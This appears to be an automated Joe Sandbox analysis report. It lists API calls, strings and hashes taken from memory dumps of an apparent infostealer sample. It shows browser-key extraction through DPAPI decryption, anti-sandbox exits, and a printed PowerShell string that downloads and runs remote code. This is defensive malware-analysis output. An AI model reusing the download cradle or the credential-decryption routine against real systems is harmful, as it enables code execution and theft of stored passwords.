                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                • String ID:
                                                • API String ID: 2311089104-0
                                                • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                APIs
                                                • __getptd.LIBCMT ref: 0082CC51
                                                  • Part of subcall function 0082C206: __getptd_noexit.LIBCMT ref: 0082C209
                                                  • Part of subcall function 0082C206: __amsg_exit.LIBCMT ref: 0082C216
                                                • __amsg_exit.LIBCMT ref: 0082CC71
                                                • __lock.LIBCMT ref: 0082CC81
                                                • InterlockedDecrement.KERNEL32(?), ref: 0082CC9E
                                                • free.MSVCRT ref: 0082CCB1
                                                • InterlockedIncrement.KERNEL32(0042B980), ref: 0082CCC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                • String ID:
                                                • API String ID: 634100517-0
                                                • Opcode ID: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                                                • Instruction ID: c7cab9cb1c5b96b136dc817eac57b2027e4f178f989d6897ed37dbbf97c9620d
                                                • Opcode Fuzzy Hash: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                                                • Instruction Fuzzy Hash: 0F01C031A01B34EBCB21AB69B44577D77A0FF14720F504126EC18E7290CB3469C1DBDA
                                                APIs
                                                • __getptd.LIBCMT ref: 0041C9EA
                                                  • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                  • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                • __amsg_exit.LIBCMT ref: 0041CA0A
                                                • __lock.LIBCMT ref: 0041CA1A
                                                • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                • free.MSVCRT ref: 0041CA4A
                                                • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                • String ID:
                                                • API String ID: 634100517-0
                                                • Opcode ID: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                                                • Instruction ID: 63787520114d18ae3399c837c16bfac6c494309a1b2e91ce42418771fe72ad0a
                                                • Opcode Fuzzy Hash: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                                                • Instruction Fuzzy Hash: DD01C431A817299BC722EB669C857DE77A0BF04794F11811BE814A7390C73C69D2CBDD
                                                APIs
                                                • strlen.MSVCRT ref: 00827186
                                                • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00827401,00000000,00420BA8,00000000,00000000), ref: 008271B4
                                                  • Part of subcall function 00826E37: strlen.MSVCRT ref: 00826E48
                                                  • Part of subcall function 00826E37: strlen.MSVCRT ref: 00826E6C
                                                • VirtualQueryEx.KERNEL32(00827574,00000000,?,0000001C), ref: 008271F9
                                                • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00827401), ref: 0082731A
                                                  • Part of subcall function 00827047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 0082705F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: strlen$MemoryProcessQueryReadVirtual
                                                • String ID: @
                                                • API String ID: 2950663791-2766056989
                                                • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                • Instruction ID: 6ca31889fd4b74c47e68a85e81923f69ebe089a3c3bc020d2141d008fe0ce485
                                                • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                • Instruction Fuzzy Hash: 765104B1A0411AEBDB04CF99E981AEFB7B6FF88300F108119F915E7240D734AE51DBA5
                                                APIs
                                                • strlen.MSVCRT ref: 00416F1F
                                                • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                  • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                  • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                  • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: strlen$MemoryProcessQueryReadVirtual
                                                • String ID: @
                                                • API String ID: 2950663791-2766056989
                                                • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                APIs
                                                • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: *n@$*n@
                                                • API String ID: 1029625771-193229609
                                                • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                APIs
                                                • lstrcat.KERNEL32(?,0064A30C), ref: 00824A42
                                                  • Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072
                                                • lstrcat.KERNEL32(?,00000000), ref: 00824A68
                                                • lstrcat.KERNEL32(?,?), ref: 00824A87
                                                • lstrcat.KERNEL32(?,?), ref: 00824A9B
                                                • lstrcat.KERNEL32(?,0064A284), ref: 00824AAE
                                                • lstrcat.KERNEL32(?,?), ref: 00824AC2
                                                • lstrcat.KERNEL32(?,0064A2C8), ref: 00824AD6
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 00828FF7: GetFileAttributesA.KERNEL32(00000000,?,00811DBB,?,?,00425654,?,?,00420E1F), ref: 00829006
                                                  • Part of subcall function 008247D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008247E7
                                                  • Part of subcall function 008247D7: RtlAllocateHeap.NTDLL(00000000), ref: 008247EE
                                                  • Part of subcall function 008247D7: wsprintfA.USER32 ref: 0082480D
                                                  • Part of subcall function 008247D7: FindFirstFileA.KERNEL32(?,?), ref: 00824824
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                • String ID:
                                                • API String ID: 2540262943-0
                                                • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                • Instruction ID: b1f70f968a282c927eae9d6093052c4c838516f9361db190d4ffb5f0da573e46
                                                • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                • Instruction Fuzzy Hash: 7E3191B6940218ABCB14FBF4DC89EE9737CFB58700F404589B245D2081DEB097C9CB96
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                Strings
                                                • <, xrefs: 00412D39
                                                • ')", xrefs: 00412CB3
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                • API String ID: 3031569214-898575020
                                                • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                APIs
                                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008114A5
                                                • __aulldiv.LIBCMT ref: 008114BF
                                                • __aulldiv.LIBCMT ref: 008114CD
                                                • ExitProcess.KERNEL32 ref: 008114FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                • String ID: @
                                                • API String ID: 3404098578-2766056989
                                                • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                • Instruction ID: 06ec757eed18a334d1919d818dbb755ee9c13b33b24f35edf585969ca26aea2f
                                                • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                • Instruction Fuzzy Hash: 4701E8B0941308EAEF109BD4D889B9DBA79FF40B05F208458E705B6280D6B49585875A
                                                APIs
                                                • memcmp.MSVCRT(?,00421264,00000003), ref: 0081A094
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 00820CC7: memset.MSVCRT ref: 00820E83
                                                  • Part of subcall function 00820CC7: lstrcat.KERNEL32(?,00000000), ref: 00820E9C
                                                  • Part of subcall function 00820CC7: lstrcat.KERNEL32(?,00420D7C), ref: 00820EAE
                                                  • Part of subcall function 00820CC7: lstrcat.KERNEL32(?,00000000), ref: 00820EC4
                                                  • Part of subcall function 00820CC7: lstrcat.KERNEL32(?,00420D80), ref: 00820ED6
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • memcmp.MSVCRT(?,00421114,00000003), ref: 0081A116
                                                • memset.MSVCRT ref: 0081A14F
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 0081A1A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                • String ID: @
                                                • API String ID: 1977917189-2766056989
                                                • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                • Instruction ID: 98642f689f5bbc98da8b98f976be66256a11b10c5763e82f19088c15d248a593
                                                • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                • Instruction Fuzzy Hash: 87614930600258DBCF18EFA8DD96FED77B9FF44304F408118E90A9B691DB746A85CB42
                                                APIs
                                                • strtok_s.MSVCRT ref: 00410DB8
                                                • strtok_s.MSVCRT ref: 00410EFD
                                                  • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
                                                  • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: strtok_s$lstrcpylstrlen
                                                • String ID:
                                                • API String ID: 348468850-0
                                                • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                  • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                  • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                  • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                  • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                  • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                  • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                  • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                  • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                  • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                  • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                  • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                  • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                  • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                • String ID: $"encrypted_key":"$DPAPI
                                                • API String ID: 3731072634-738592651
                                                • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CodeInfoPageValidmemset
                                                • String ID:
                                                • API String ID: 703783727-0
                                                • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                • Instruction ID: 76792bffc9634d0f0bd851dab10c0968207ee2dfb1301ea88c4df7d85f58b550
                                                • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                • Instruction Fuzzy Hash: E8312834A042B59ED7258F38EC9527DBFA0FF05314B1841BAD882CF192C778C885D762
                                                APIs
                                                • GetSystemTime.KERNEL32(?), ref: 00826BD3
                                                • sscanf.NTDLL ref: 00826C00
                                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00826C19
                                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00826C27
                                                • ExitProcess.KERNEL32 ref: 00826C41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Time$System$File$ExitProcesssscanf
                                                • String ID:
                                                • API String ID: 2533653975-0
                                                • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                • Instruction ID: 70a53459e7e362d899cda8d7d8eeeec3d6f3d07fef943e6b0fc048dc803ee927
                                                • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                • Instruction Fuzzy Hash: 9321E7B5D04219ABCF08EFE8E9459EEB7BAFF48300F04852EE406E3250EB345604CB65
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                • wsprintfA.USER32 ref: 00418850
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocProcesslstrcpywsprintf
                                                • String ID: Fs$%dx%d
                                                • API String ID: 2716131235-1170756869
                                                • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0082809E
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 008280A5
                                                • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 008280C5
                                                • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 008280E6
                                                • RegCloseKey.ADVAPI32(?), ref: 008280F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                • String ID:
                                                • API String ID: 3225020163-0
                                                • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                • Instruction ID: 474f3e6314bfcf2c9ca175d31d4434e2de8317a88eb36ee71535ba7e4271e6c3
                                                • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                • Instruction Fuzzy Hash: 43113DB5A84219FBDB10CFD4ED4AFABB7B9FB05710F104119F615A7280CB7568018BA1
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                • RegOpenKeyExA.ADVAPI32(80000002,00895E90,00000000,00020119,?), ref: 00417E5E
                                                • RegQueryValueExA.ADVAPI32(?,008C9C20,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                • String ID:
                                                • API String ID: 3466090806-0
                                                • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
